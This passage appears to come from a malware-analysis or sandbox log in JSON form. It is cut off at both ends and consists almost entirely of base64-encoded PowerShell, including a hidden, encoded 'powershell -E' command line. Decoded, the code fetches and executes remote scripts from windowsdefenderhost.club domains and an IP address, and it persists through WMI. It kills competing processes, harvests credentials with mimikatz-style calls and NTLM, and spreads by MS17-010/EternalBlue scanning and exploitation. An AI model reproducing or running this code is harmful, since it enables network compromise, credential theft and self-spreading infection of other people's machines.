0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByA